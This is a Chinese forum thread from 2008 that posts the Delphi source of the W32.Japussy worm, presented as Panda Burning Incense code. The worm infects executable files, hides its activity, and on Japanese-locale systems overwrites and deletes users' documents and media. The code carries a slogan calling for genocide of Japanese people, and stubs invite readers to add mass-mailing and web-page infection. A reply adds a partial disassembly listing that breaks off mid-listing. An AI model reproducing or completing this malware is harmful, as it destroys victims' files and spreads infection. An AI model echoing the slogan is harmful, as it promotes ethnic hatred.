402996575 2008-5-24 16:56
病毒代码——熊猫烧香核心代码
[url=http://www.fanghei.net/upfiles/2007/20070411115632.jpg][img]http://www.fanghei.net/upfiles/2007/20070411115632.jpg[/img][/url]
program japussy;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
headersize = 82432; //病毒体的大小
iconoffset = $12eb8; //pe文件主图标的偏移量
//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
headersize = 38912; //upx压缩过病毒体的大小
iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量
//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize = $2e8; //pe文件主图标的大小--744字节
icontail = iconoffset + iconsize; //pe文件主图标的尾部
id = $44444444; //感染标记
//垃圾码,以备写入
catchword = 'if a race need to be killed out, it must be yamato. ' +
'if a country need to be destroyed, it must be japan! ' +
'*** w32.japussy.worm.a ***';
{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll'; //函数声明
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = false; //日文操作系统标记
{ 判断是否为win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
{ 在流之间复制 }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.copyfrom(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.seek(headersize, 0); //跳过头部的病毒部分
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{ 填充startupinfo结构 }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
{ 发带毒邮件 }
procedure sendmail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染pe文件 }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出错则文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //检查pe文件头
begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe标记
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.seek(-4, sofromend); //检查感染标记
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染过了或不是pe文件则退出
exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
//得到被感染文件的主图标(744字节),存入流
aicon.releasehandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
//头文件
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
//写入病毒体主图标之前的数据
copystream(hdrstream, 0, dststream, 0, iconoffset);
//写入目前程序的主图标
copystream(icostream, 22, dststream, iconoffset, iconsize);
//写入病毒体主图标到病毒体尾部之间的数据
copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
//写入宿主程序
copystream(srcstream, 0, dststream, headersize, srcstream.size);
//写入已感染的标记
dststream.seek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); //替换宿主文件
dststream.free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
setfileattributes(pchar(filename), 0); //去掉只读属性
filehandle := fileopen(filename, fmopenwrite); //打开文件
try
size := getfilesize(filehandle, nil); //文件大小
i := 0;
randomize;
max := random(15); //写入垃圾码的随机次数
if max < 5 then
max := 5;
mass := size div max; //每个间隔块的大小
len := length(catchword);
while i < max do
begin
fileseek(filehandle, i * mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
filewrite(filehandle, catchword, len);
inc(i);
end;
finally
fileclose(filehandle); //关闭文件
end;
deletefile(pchar(filename)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//得到本地磁盘和网络盘
if (disktype = drive_fixed) or (disktype = drive_remote) then
result := result + d;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
function isvaliddir(searchrec: tsearchrec): integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 0 //不是目录
else if (searchrec.attr = 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 1 //不是根目录
else result := 2; //是根目录
end;
begin
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
repeat
peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑
if isvaliddir(searchrec) = 0 then
begin
fn := path + searchrec.name;
ext := uppercase(extractfileext(fn));
if (ext = '.exe') or (ext = '.scr') then
begin
infectonefile(fn); //感染可执行文件
end
else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
begin
//感染html和asp文件,将base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if ext = '.wab' then //outlook地址簿文件
begin
//获取outlook邮件地址
end
else if ext = '.adc' then //foxmail地址自动完成文件
begin
//获取foxmail邮件地址
end
else if ext = 'ind' then //foxmail地址簿文件
begin
//获取foxmail邮件地址
end
else
begin
if isjap then //是倭文操作系统
begin
if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
smashfile(fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑
sleep(200);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
begin
repeat
if isvaliddir(searchrec) = 1 then
subdir.add(searchrec.name);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
count := subdir.count - 1;
for i := 0 to count do
loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ 遍历磁盘上所有的文件 }
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then //日文操作系统
isjap := true; //去死吧!
driverlist := getdrives; //得到可写的磁盘列表
len := length(driverlist);
while true do //死循环
begin
for i := len downto 1 do //遍历每个磁盘驱动器
loopfiles(driverlist + ':\', '*.*'); //感染之
sendmail; //发带毒邮件
sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if iswin9x then //是win9x
registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程
else //winnt
begin
//远程线程映射到explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
tmpfile := paramstr(0); //创建临时文件
delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格
extractfile(tmpfile); //分离之
fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi); //创建新进程运行之
infectfiles; //感染和发邮件
end;
end.
gaoyoo 2008-6-6 08:25
哀,这不是真熊猫。只是一个用熊猫的技术的另一个病毒——w32.japussy.worm.a。
真熊猫的原代码在警察叔叔那里呢!
我这里有反编译的真熊猫汇编代码
**************************************************************
00401000 . /04104000 DD setup_un.00401004
00401004 \0A DB 0A
00401005 . 06 DB 06
00401006 . 53 74 72 69 6>ASCII "String"
0040100C 58104000 DD setup_un.00401058 ; ASCII 07,"TObject"
00401010 00 DB 00
00401011 00 DB 00
00401012 00 DB 00
00401013 00 DB 00
00401014 00 DB 00
00401015 00 DB 00
00401016 00 DB 00
00401017 00 DB 00
00401018 00 DB 00
00401019 00 DB 00
0040101A 00 DB 00
0040101B 00 DB 00
0040101C 00 DB 00
0040101D 00 DB 00
0040101E 00 DB 00
0040101F 00 DB 00
00401020 00 DB 00
00401021 00 DB 00
00401022 00 DB 00
00401023 00 DB 00
00401024 00 DB 00
00401025 00 DB 00
00401026 00 DB 00
00401027 00 DB 00
00401028 00 DB 00
00401029 00 DB 00
0040102A 00 DB 00
0040102B 00 DB 00
0040102C 58104000 DD setup_un.00401058 ; ASCII 07,"TObject"
00401030 04 DB 04
00401031 00 DB 00
00401032 00 DB 00
00401033 00 DB 00
00401034 00 DB 00
00401035 00 DB 00
00401036 00 DB 00
00401037 00 DB 00
00401038 94334000 DD setup_un.00403394
0040103C A0334000 DD setup_un.004033A0
00401040 A4334000 DD setup_un.004033A4
00401044 A8334000 DD setup_un.004033A8
00401048 9C334000 DD setup_un.0040339C
0040104C 78324000 DD setup_un.00403278
00401050 94324000 DD setup_un.00403294
00401054 D0324000 DD setup_un.004032D0
00401058 . 07 DB 07
00401059 . 54 4F 62 6A 6>ASCII "TObject"
00401060 $- FF25 B4014100 JMP DWORD PTR DS:[<&kernel32.CloseHandle>; kernel32.CloseHandle
00401066 8BC0 MOV EAX,EAX
00401068 $- FF25 B0014100 JMP DWORD PTR DS:[<&kernel32.CreateFileA>; kernel32.CreateFileA
0040106E 8BC0 MOV EAX,EAX
00401070 $- FF25 AC014100 JMP DWORD PTR DS:[<&kernel32.GetFileType>; kernel32.GetFileType
00401076 8BC0 MOV EAX,EAX
00401078 $- FF25 A8014100 JMP DWORD PTR DS:[<&kernel32.GetFileSize>; kernel32.GetFileSize
0040107E 8BC0 MOV EAX,EAX
00401080 $- FF25 A4014100 JMP DWORD PTR DS:[<&kernel32.GetStdHandl>; kernel32.GetStdHandle
00401086 8BC0 MOV EAX,EAX
00401088 .- FF25 A0014100 JMP DWORD PTR DS:[<&kernel32.RaiseExcept>; kernel32.RaiseException
0040108E 8BC0 MOV EAX,EAX
00401090 $- FF25 9C014100 JMP DWORD PTR DS:[<&kernel32.ReadFile>] ; kernel32.ReadFile
00401096 8BC0 MOV EAX,EAX
00401098 .- FF25 98014100 JMP DWORD PTR DS:[<&kernel32.RtlUnwind>] ; ntdll.RtlUnwind
0040109E 8BC0 MOV EAX,EAX
004010A0 $- FF25 94014100 JMP DWORD PTR DS:[<&kernel32.SetEndOfFil>; kernel32.SetEndOfFile
004010A6 8BC0 MOV EAX,EAX
004010A8 $- FF25 90014100 JMP DWORD PTR DS:[<&kernel32.SetFilePoin>; kernel32.SetFilePointer
004010AE 8BC0 MOV EAX,EAX
004010B0 $- FF25 8C014100 JMP DWORD PTR DS:[<&kernel32.UnhandledEx>; kernel32.UnhandledExceptionFilter
004010B6 8BC0 MOV EAX,EAX
004010B8 $- FF25 88014100 JMP DWORD PTR DS:[<&kernel32.WriteFile>] ; kernel32.WriteFile
004010BE 8BC0 MOV EAX,EAX
004010C0 $- FF25 C4014100 JMP DWORD PTR DS:[<&user32.CharNextA>] ; USER32.CharNextA
004010C6 8BC0 MOV EAX,EAX
004010C8 $- FF25 84014100 JMP DWORD PTR DS:[<&kernel32.CreateThrea>; kernel32.CreateThread
004010CE 8BC0 MOV EAX,EAX
004010D0 .- FF25 80014100 JMP DWORD PTR DS:[<&kernel32.ExitProcess>; kernel32.ExitProcess
004010D6 8BC0 MOV EAX,EAX
004010D8 $- FF25 C0014100 JMP DWORD PTR DS:[<&user32.MessageBoxA>] ; USER32.MessageBoxA
004010DE 8BC0 MOV EAX,EAX
004010E0 $- FF25 7C014100 JMP DWORD PTR DS:[<&kernel32.FreeLibrary>; kernel32.FreeLibrary
004010E6 8BC0 MOV EAX,EAX
004010E8 $- FF25 78014100 JMP DWORD PTR DS:[<&kernel32.GetCommandL>; kernel32.GetCommandLineA
004010EE 8BC0 MOV EAX,EAX
004010F0 $- FF25 74014100 JMP DWORD PTR DS:[<&kernel32.GetLastErro>; ntdll.RtlGetLastWin32Error
004010F6 8BC0 MOV EAX,EAX
004010F8 $- FF25 70014100 JMP DWORD PTR DS:[<&kernel32.GetLocaleIn>; kernel32.GetLocaleInfoA
004010FE 8BC0 MOV EAX,EAX
00401100 $- FF25 6C014100 JMP DWORD PTR DS:[<&kernel32.GetModuleFi>; kernel32.GetModuleFileNameA
00401106 8BC0 MOV EAX,EAX
00401108 $- FF25 68014100 JMP DWORD PTR DS:[<&kernel32.GetStartupI>; kernel32.GetStartupInfoA
0040110E 8BC0 MOV EAX,EAX
00401110 $- FF25 64014100 JMP DWORD PTR DS:[<&kernel32.GetThreadLo>; kernel32.GetThreadLocale
00401116 8BC0 MOV EAX,EAX
00401118 $- FF25 60014100 JMP DWORD PTR DS:[<&kernel32.MultiByteTo>; kernel32.MultiByteToWideChar
0040111E 8BC0 MOV EAX,EAX
00401120 $- FF25 D4014100 JMP DWORD PTR DS:[<&advapi32.RegCloseKey>; ADVAPI32.RegCloseKey
00401126 8BC0 MOV EAX,EAX
00401128 $- FF25 D0014100 JMP DWORD PTR DS:[<&advapi32.RegOpenKeyE>; ADVAPI32.RegOpenKeyExA
0040112E 8BC0 MOV EAX,EAX
00401130 $- FF25 CC014100 JMP DWORD PTR DS:[<&advapi32.RegQueryVal>; ADVAPI32.RegQueryValueExA
00401136 8BC0 MOV EAX,EAX
00401138 $- FF25 5C014100 JMP DWORD PTR DS:[<&kernel32.WideCharToM>; kernel32.WideCharToMultiByte
0040113E 8BC0 MOV EAX,EAX
00401140 $- FF25 E0014100 JMP DWORD PTR DS:[<&oleaut32.SysAllocStr>; OLEAUT32.SysAllocStringLen
00401146 8BC0 MOV EAX,EAX
00401148 $- FF25 DC014100 JMP DWORD PTR DS:[<&oleaut32.SysFreeStri>; OLEAUT32.SysFreeString
0040114E 8BC0 MOV EAX,EAX
00401150 $- FF25 58014100 JMP DWORD PTR DS:[<&kernel32.GetCurrentT>; kernel32.GetCurrentThreadId
00401156 8BC0 MOV EAX,EAX
00401158 $- FF25 54014100 JMP DWORD PTR DS:[<&kernel32.GetVersion>>; kernel32.GetVersion
0040115E 8BC0 MOV EAX,EAX
00401160 $- FF25 50014100 JMP DWORD PTR DS:[<&kernel32.QueryPerfor>; kernel32.QueryPerformanceCounter
00401166 8BC0 MOV EAX,EAX
00401168 $- FF25 4C014100 JMP DWORD PTR DS:[<&kernel32.GetTickCoun>; kernel32.GetTickCount
0040116E 8BC0 MOV EAX,EAX
00401170 /$ 53 PUSH EBX
00401171 |. 83C4 BC ADD ESP,-44
00401174 |. BB 0A000000 MOV EBX,0A
00401179 |. 54 PUSH ESP ; /pStartupinfo
0040117A |. E8 89FFFFFF CALL <JMP.&kernel32.GetStartupInfoA> ; \GetStartupInfoA
0040117F |. F64424 2C 01 TEST BYTE PTR SS:[ESP+2C],1
00401184 |. 74 05 JE SHORT setup_un.0040118B
00401186 |. 0FB75C24 30 MOVZX EBX,WORD PTR SS:[ESP+30]
0040118B |> 8BC3 MOV EAX,EBX
0040118D |. 83C4 44 ADD ESP,44
00401190 |. 5B POP EBX
00401191 \. C3 RETN
00401192 8BC0 MOV EAX,EAX
00401194 $- FF25 48014100 JMP DWORD PTR DS:[<&kernel32.LocalAlloc>>; kernel32.LocalAlloc
0040119A 8BC0 MOV EAX,EAX
0040119C $- FF25 44014100 JMP DWORD PTR DS:[<&kernel32.LocalFree>] ; kernel32.LocalFree
004011A2 8BC0 MOV EAX,EAX
004011A4 $- FF25 40014100 JMP DWORD PTR DS:[<&kernel32.VirtualAllo>; kernel32.VirtualAlloc
004011AA 8BC0 MOV EAX,EAX
004011AC $- FF25 3C014100 JMP DWORD PTR DS:[<&kernel32.VirtualFree>; kernel32.VirtualFree
004011B2 8BC0 MOV EAX,EAX
004011B4 $- FF25 38014100 JMP DWORD PTR DS:[<&kernel32.InitializeC>; kernel32.InitializeCriticalSection
004011BA 8BC0 MOV EAX,EAX
004011BC $- FF25 34014100 JMP DWORD PTR DS:[<&kernel32.EnterCritic>; ntdll.RtlEnterCriticalSection
004011C2 8BC0 MOV EAX,EAX
004011C4 $- FF25 30014100 JMP DWORD PTR DS:[<&kernel32.LeaveCritic>; ntdll.RtlLeaveCriticalSection
004011CA 8BC0 MOV EAX,EAX
004011CC $- FF25 2C014100 JMP DWORD PTR DS:[<&kernel32.DeleteCriti>; ntdll.RtlDeleteCriticalSection
004011D2 8BC0 MOV EAX,EAX
004011D4 /$ 53 PUSH EBX
004011D5 |. 56 PUSH ESI
004011D6 |. BE D0F54000 MOV ESI,setup_un.0040F5D0
004011DB |. 833E 00 CMP DWORD PTR DS:[ESI],0
004011DE |. 75 3A JNZ SHORT setup_un.0040121A
004011E0 |. 68 44060000 PUSH 644 ; /Size = 644 (1604.)
004011E5 |. 6A 00 PUSH 0 ; |Flags = LMEM_FIXED
004011E7 |. E8 A8FFFFFF CALL <JMP.&kernel32.LocalAlloc> ; \LocalAlloc
004011EC |. 8BC8 MOV ECX,EAX
004011EE |. 85C9 TEST ECX,ECX
004011F0 |. 75 05 JNZ SHORT setup_un.004011F7
004011F2 |. 33C0 XOR EAX,EAX
004011F4 |. 5E POP ESI
004011F5 |. 5B POP EBX
004011F6 |. C3 RETN
004011F7 |> A1 CCF54000 MOV EAX,DWORD PTR DS:[40F5CC]
004011FC |. 8901 MOV DWORD PTR DS:[ECX],EAX
004011FE |. 890D CCF54000 MOV DWORD PTR DS:[40F5CC],ECX
00401204 |. 33D2 XOR EDX,EDX
00401206 |> 8BC2 /MOV EAX,EDX
00401208 |. 03C0 |ADD EAX,EAX
0040120A |. 8D44C1 04 |LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
0040120E |. 8B1E |MOV EBX,DWORD PTR DS:[ESI]
00401210 |. 8918 |MOV DWORD PTR DS:[EAX],EBX
00401212 |. 8906 |MOV DWORD PTR DS:[ESI],EAX
00401214 |. 42 |INC EDX
00401215 |. 83FA 64 |CMP EDX,64
00401218 |.^ 75 EC \JNZ SHORT setup_un.00401206
0040121A |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
0040121C |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
0040121E |. 8916 MOV DWORD PTR DS:[ESI],EDX
00401220 |. 5E POP ESI
00401221 |. 5B POP EBX
00401222 \. C3 RETN
00401223 90 NOP
00401224 /$ 8900 MOV DWORD PTR DS:[EAX],EAX
00401226 |. 8940 04 MOV DWORD PTR DS:[EAX+4],EAX
00401229 \. C3 RETN
0040122A 8BC0 MOV EAX,EAX
0040122C /$ 53 PUSH EBX
0040122D |. 56 PUSH ESI
0040122E |. 8BF2 MOV ESI,EDX
00401230 |. 8BD8 MOV EBX,EAX
00401232 |. E8 9DFFFFFF CALL setup_un.004011D4
00401237 |. 85C0 TEST EAX,EAX
00401239 |. 75 05 JNZ SHORT setup_un.00401240
0040123B |. 33C0 XOR EAX,EAX
0040123D |. 5E POP ESI
0040123E |. 5B POP EBX
0040123F |. C3 RETN
00401240 |> 8B16 MOV EDX,DWORD PTR DS:[ESI]
00401242 |. 8950 08 MOV DWORD PTR DS:[EAX+8],EDX
00401245 |. 8B56 04 MOV EDX,DWORD PTR DS:[ESI+4]
00401248 |. 8950 0C MOV DWORD PTR DS:[EAX+C],EDX
0040124B |. 8B13 MOV EDX,DWORD PTR DS:[EBX]
0040124D |. 8910 MOV DWORD PTR DS:[EAX],EDX
0040124F |. 8958 04 MOV DWORD PTR DS:[EAX+4],EBX
00401252 |. 8942 04 MOV DWORD PTR DS:[EDX+4],EAX
00401255 |. 8903 MOV DWORD PTR DS:[EBX],EAX
00401257 |. B0 01 MOV AL,1
00401259 |. 5E POP ESI
0040125A |. 5B POP EBX
0040125B \. C3 RETN
0040125C /$ 8B50 04 MOV EDX,DWORD PTR DS:[EAX+4]
0040125F |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
00401261 |. 890A MOV DWORD PTR DS:[EDX],ECX
00401263 |. 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
00401266 |. 8B15 D0F54000 MOV EDX,DWORD PTR DS:[40F5D0]
0040126C |. 8910 MOV DWORD PTR DS:[EAX],EDX
0040126E |. A3 D0F54000 MOV DWORD PTR DS:[40F5D0],EAX
00401273 \. C3 RETN
00401274 /$ 53 PUSH EBX
00401275 |. 56 PUSH ESI
00401276 |. 57 PUSH EDI
00401277 |. 55 PUSH EBP
00401278 |. 51 PUSH ECX
00401279 |. 8BF1 MOV ESI,ECX
0040127B |. 891424 MOV DWORD PTR SS:[ESP],EDX
0040127E |. 8BE8 MOV EBP,EAX
00401280 |. 8B5D 00 MOV EBX,DWORD PTR SS:[EBP]
00401283 |. 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00401286 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
00401288 |. 8916 MOV DWORD PTR DS:[ESI],EDX
0040128A |. 8B50 04 MOV EDX,DWORD PTR DS:[EAX+4]
0040128D |. 8956 04 MOV DWORD PTR DS:[ESI+4],EDX
00401290 |> 8B3B /MOV EDI,DWORD PTR DS:[EBX]
00401292 |. 8B06 |MOV EAX,DWORD PTR DS:[ESI]
00401294 |. 8B53 08 |MOV EDX,DWORD PTR DS:[EBX+8]
00401297 |. 0353 0C |ADD EDX,DWORD PTR DS:[EBX+C]
0040129A |. 3BC2 |CMP EAX,EDX
0040129C |. 75 14 |JNZ SHORT setup_un.004012B2
0040129E |. 8BC3 |MOV EAX,EBX
004012A0 |. E8 B7FFFFFF |CALL setup_un.0040125C
004012A5 |. 8B43 08 |MOV EAX,DWORD PTR DS:[EBX+8]
004012A8 |. 8906 |MOV DWORD PTR DS:[ESI],EAX
004012AA |. 8B43 0C |MOV EAX,DWORD PTR DS:[EBX+C]
004012AD |. 0146 04 |ADD DWORD PTR DS:[ESI+4],EAX
004012B0 |. EB 15 |JMP SHORT setup_un.004012C7
004012B2 |> 0346 04 |ADD EAX,DWORD PTR DS:[ESI+4]
004012B5 |. 3B43 08 |CMP EAX,DWORD PTR DS:[EBX+8]
004012B8 |. 75 0D |JNZ SHORT setup_un.004012C7
004012BA |. 8BC3 |MOV EAX,EBX
004012BC |. E8 9BFFFFFF |CALL setup_un.0040125C
004012C1 |. 8B43 0C |MOV EAX,DWORD PTR DS:[EBX+C]
004012C4 |. 0146 04 |ADD DWORD PTR DS:[ESI+4],EAX
004012C7 |> 8BDF |MOV EBX,EDI
004012C9 |. 3BEB |CMP EBP,EBX
004012CB |.^ 75 C3 \JNZ SHORT setup_un.00401290
004012CD |. 8BD6 MOV EDX,ESI
004012CF |. 8BC5 MOV EAX,EBP
004012D1 |. E8 56FFFFFF CALL setup_un.0040122C
004012D6 |. 84C0 TEST AL,AL
004012D8 |. 75 04 JNZ SHORT setup_un.004012DE
004012DA |. 33C0 XOR EAX,EAX
004012DC |. 8906 MOV DWORD PTR DS:[ESI],EAX
004012DE |> 5A POP EDX
004012DF |. 5D POP EBP
004012E0 |. 5F POP EDI
004012E1 |. 5E POP ESI
004012E2 |. 5B POP EBX
004012E3 \. C3 RETN
004012E4 /$ 53 PUSH EBX
004012E5 |. 56 PUSH ESI
004012E6 |. 57 PUSH EDI
004012E7 |. 55 PUSH EBP
004012E8 |. 83C4 F8 ADD ESP,-8
004012EB |. 8BD8 MOV EBX,EAX
004012ED |. 8BFB MOV EDI,EBX
004012EF |> 8B32 /MOV ESI,DWORD PTR DS:[EDX]
004012F1 |. 8B43 08 |MOV EAX,DWORD PTR DS:[EBX+8]
004012F4 |. 3BF0 |CMP ESI,EAX
004012F6 |. 72 70 |JB SHORT setup_un.00401368
004012F8 |. 8BCE |MOV ECX,ESI
004012FA |. 034A 04 |ADD ECX,DWORD PTR DS:[EDX+4]
004012FD |. 8BE8 |MOV EBP,EAX
004012FF |. 036B 0C |ADD EBP,DWORD PTR DS:[EBX+C]
00401302 |. 3BCD |CMP ECX,EBP
00401304 |. 77 62 |JA SHORT setup_un.00401368
00401306 |. 3BF0 |CMP ESI,EAX
00401308 |. 75 1B |JNZ SHORT setup_un.00401325
0040130A |. 8B42 04 |MOV EAX,DWORD PTR DS:[EDX+4]
0040130D |. 0143 08 |ADD DWORD PTR DS:[EBX+8],EAX
00401310 |. 8B42 04 |MOV EAX,DWORD PTR DS:[EDX+4]
00401313 |. 2943 0C |SUB DWORD PTR DS:[EBX+C],EAX
00401316 |. 837B 0C 00 |CMP DWORD PTR DS:[EBX+C],0
0040131A |. 75 48 |JNZ SHORT setup_un.00401364
0040131C |. 8BC3 |MOV EAX,EBX
0040131E |. E8 39FFFFFF |CALL setup_un.0040125C
00401323 |. EB 3F |JMP SHORT setup_un.00401364
00401325 |> 8BCE |MOV ECX,ESI
00401327 |. 8B7A 04 |MOV EDI,DWORD PTR DS:[EDX+4]
0040132A |. 03CF |ADD ECX,EDI
0040132C |. 8BE8 |MOV EBP,EAX
0040132E |. 036B 0C |ADD EBP,DWORD PTR DS:[EBX+C]
00401331 |. 3BCD |CMP ECX,EBP
00401333 |. 75 05 |JNZ SHORT setup_un.0040133A
00401335 |. 297B 0C |SUB DWORD PTR DS:[EBX+C],EDI
00401338 |. EB 2A |JMP SHORT setup_un.00401364
0040133A |> 8B0A |MOV ECX,DWORD PTR DS:[EDX]
0040133C |. 034A 04 |ADD ECX,DWORD PTR DS:[EDX+4]
0040133F |. 890C24 |MOV DWORD PTR SS:[ESP],ECX
00401342 |. 8B7B 08 |MOV EDI,DWORD PTR DS:[EBX+8]
00401345 |. 037B 0C |ADD EDI,DWORD PTR DS:[EBX+C]
00401348 |. 2BF9 |SUB EDI,ECX
0040134A |. 897C24 04 |MOV DWORD PTR SS:[ESP+4],EDI
0040134E |. 2BF0 |SUB ESI,EAX
00401350 |. 8973 0C |MOV DWORD PTR DS:[EBX+C],ESI
00401353 |. 8BD4 |MOV EDX,ESP
00401355 |. 8BC3 |MOV EAX,EBX
00401357 |. E8 D0FEFFFF |CALL setup_un.0040122C
0040135C |. 84C0 |TEST AL,AL
0040135E |. 75 04 |JNZ SHORT setup_un.00401364
00401360 |. 33C0 |XOR EAX,EAX
00401362 |. EB 0C |JMP SHORT setup_un.00401370
00401364 |> B0 01 |MOV AL,1
00401366 |. EB 08 |JMP SHORT setup_un.00401370
00401368 |> 8B1B |MOV EBX,DWORD PTR DS:[EBX]
0040136A |. 3BFB |CMP EDI,EBX
0040136C |.^ 75 81 \JNZ SHORT setup_un.004012EF
0040136E |. 33C0 XOR EAX,EAX
00401370 |> 59 POP ECX
00401371 |. 5A POP EDX
00401372 |. 5D POP EBP
00401373 |. 5F POP EDI
00401374 |. 5E POP ESI
00401375 |. 5B POP EBX
00401376 \. C3 RETN
00401377 90 NOP
00401378 /$ 53 PUSH EBX
00401379 |. 56 PUSH ESI
0040137A |. 57 PUSH EDI
0040137B |. 8BDA MOV EBX,EDX
0040137D |. 8BF0 MOV ESI,EAX
0040137F |. 81FE 00001000 CMP ESI,100000
00401385 |. 7D 07 JGE SHORT setup_un.0040138E
00401387 |. BE 00001000 MOV ESI,100000
0040138C |. EB 0C JMP SHORT setup_un.0040139A
0040138E |> 81C6 FFFF0000 ADD ESI,0FFFF
00401394 |. 81E6 0000FFFF AND ESI,FFFF0000
0040139A |> 8973 04 MOV DWORD PTR DS:[EBX+4],ESI
0040139D |. 6A 01 PUSH 1 ; /Protect = PAGE_NOACCESS
0040139F |. 68 00200000 PUSH 2000 ; |AllocationType = MEM_RESERVE
004013A4 |. 56 PUSH ESI ; |Size
004013A5 |. 6A 00 PUSH 0 ; |Address = NULL
004013A7 |. E8 F8FDFFFF CALL <JMP.&kernel32.VirtualAlloc> ; \VirtualAlloc
004013AC |. 8BF8 MOV EDI,EAX
004013AE |. 893B MOV DWORD PTR DS:[EBX],EDI
004013B0 |. 85FF TEST EDI,EDI
004013B2 |. 74 23 JE SHORT setup_un.004013D7
004013B4 |. 8BD3 MOV EDX,EBX
004013B6 |. B8 D4F54000 MOV EAX,setup_un.0040F5D4
004013BB |. E8 6CFEFFFF CALL setup_un.0040122C
004013C0 |. 84C0 TEST AL,AL
004013C2 |. 75 13 JNZ SHORT setup_un.004013D7
004013C4 |. 68 00800000 PUSH 8000 ; /FreeType = MEM_RELEASE
004013C9 |. 6A 00 PUSH 0 ; |Size = 0
